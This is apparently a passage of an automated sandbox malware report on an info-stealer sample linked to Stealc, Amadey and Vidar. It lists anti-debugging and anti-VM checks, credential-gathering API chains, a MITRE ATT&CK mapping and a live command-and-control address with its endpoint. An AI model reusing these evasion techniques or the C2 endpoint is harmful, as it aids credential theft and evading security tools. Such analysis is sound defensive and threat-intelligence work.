                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD02D7 second address: DD02DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4BA6 second address: DD4BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F6999135DF8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD4BC9 second address: DD4BCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6E57 second address: DD6E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F6999135DE6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD6E69 second address: DD6E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD93BA second address: DD93BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD93BE second address: DD93C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD93C6 second address: DD93CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE1315 second address: DE1319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE1319 second address: DE1323 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6999135DE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE1323 second address: DE1351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F699913D302h 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007F699913D302h 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6870 second address: DE687B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F6999135DE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7EC1 second address: DE7EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF822D second address: DF8237 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6999135DE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8237 second address: DF8240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF8240 second address: DF8246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E06EEC second address: E06EF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E075A7 second address: E075AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E075AD second address: E075DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F699913D301h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F699913D301h 0x00000010 push edi 0x00000011 pushad 0x00000012 popad 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E078A1 second address: E078A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E078A5 second address: E078BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D304h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07A6D second address: E07A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07A71 second address: E07A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07A75 second address: E07A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07A7B second address: E07A94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F699913D304h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07BDB second address: E07C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6999135DEFh 0x00000009 jmp 00007F6999135DF4h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E07C05 second address: E07C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0AC3B second address: E0AC41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0AC41 second address: E0AC8A instructions: 0x00000000 rdtsc 0x00000002 je 00007F699913D2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007F699913D308h 0x00000016 jns 00007F699913D2F8h 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 je 00007F699913D2FCh 0x00000026 jne 00007F699913D2F6h 0x0000002c je 00007F699913D2FCh 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DA8D second address: E0DA98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6999135DE6h 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DA98 second address: E0DAA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F699913D2F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508025A second address: 50802C4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6999135DF9h 0x00000008 xor al, FFFFFFF6h 0x0000000b jmp 00007F6999135DF1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F6999135DF0h 0x00000019 jmp 00007F6999135DF5h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F6999135DECh 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50802C4 second address: 508030E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D2FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F699913D302h 0x00000011 mov edx, esi 0x00000013 popad 0x00000014 mov di, ax 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007F699913D305h 0x00000022 pop esi 0x00000023 movsx ebx, si 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508030E second address: 508032C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 508032C second address: 5080347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D307h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080378 second address: 5080391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5080391 second address: 5080397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5080397 second address: 50803D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F6999135DF4h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6999135DF7h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 50803D0 second address: 508040B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F699913D309h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F699913D308h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 508040B second address: 508041A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6999135DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 508041A second address: 5080420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5080420 second address: 5080424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5080424 second address: 508045C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F699913D308h 0x00000012 sbb esi, 263EB368h 0x00000018 jmp 00007F699913D2FBh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D27754 second address: D27759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: B81A7C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D1BA35 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D42763 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: D2C417 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_009338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 1_2_009338B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00934910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00934910
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0092DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0092DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0092E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0092E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0092ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_0092ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00934570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 1_2_00934570
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0092F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0092F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00933EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 1_2_00933EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_009216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_009216D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0092DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0092DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0092BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 1_2_0092BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00921160 GetSystemInfo,ExitProcess, 1_2_00921160
                Source: file.exe, file.exe, 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000001.00000002.1386340367.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1386340367.0000000001085000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwarep
                Source: file.exe, 00000001.00000002.1386340367.00000000010B5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW}
                Source: file.exe, 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_1-13229
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_1-13232
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_1-13250
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_1-13283
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_1-13242
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_009245C0 VirtualProtect ?,00000004,00000100,00000000 1_2_009245C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00939860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00939860
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00939750 mov eax, dword ptr fs:[00000030h] 1_2_00939750
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_009378E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 1_2_009378E0
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 7324, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00939600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 1_2_00939600
                Source: file.exe, file.exe, 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 1_2_00937B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00937980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 1_2_00937980
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00937850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 1_2_00937850
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00937A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 1_2_00937A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 1.2.file.exe.920000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000003.1340711226.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7324, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 1.2.file.exe.920000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000003.1340711226.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7324, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
                MITRE ATT&CK Matrix (the number in front of a technique is the count shown by the report for that technique)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen
                file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner
                http://185.215.113.37/ | 18% | Virustotal
                http://185.215.113.37/e2b1563c6670f193.php_ | 17% | Virustotal
                http://185.215.113.37 | 18% | Virustotal
                http://185.215.113.37/e2b1563c6670f193.php | 19% | Virustotal
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37 | file.exe, 00000001.00000002.1386340367.000000000109B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.1386340367.000000000103E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php_ | file.exe, 00000001.00000002.1386340367.000000000109B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1521035
                Start date and time:2024-09-28 03:22:10 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 47s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 19
                • Number of non-executed functions: 85
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes were analyzed, report is missing behavior information
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Amadey, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
